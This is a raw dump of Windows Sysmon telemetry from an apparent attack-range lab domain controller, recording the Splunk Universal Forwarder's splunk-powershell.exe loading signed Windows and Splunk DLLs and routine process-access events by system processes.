734700x8000000000000000100748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 
734700x8000000000000000100738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL 
Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 
librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:49.702{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.703{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.187{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.187{326FD73D-C169-6294-4A0B-000000005502}40163960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
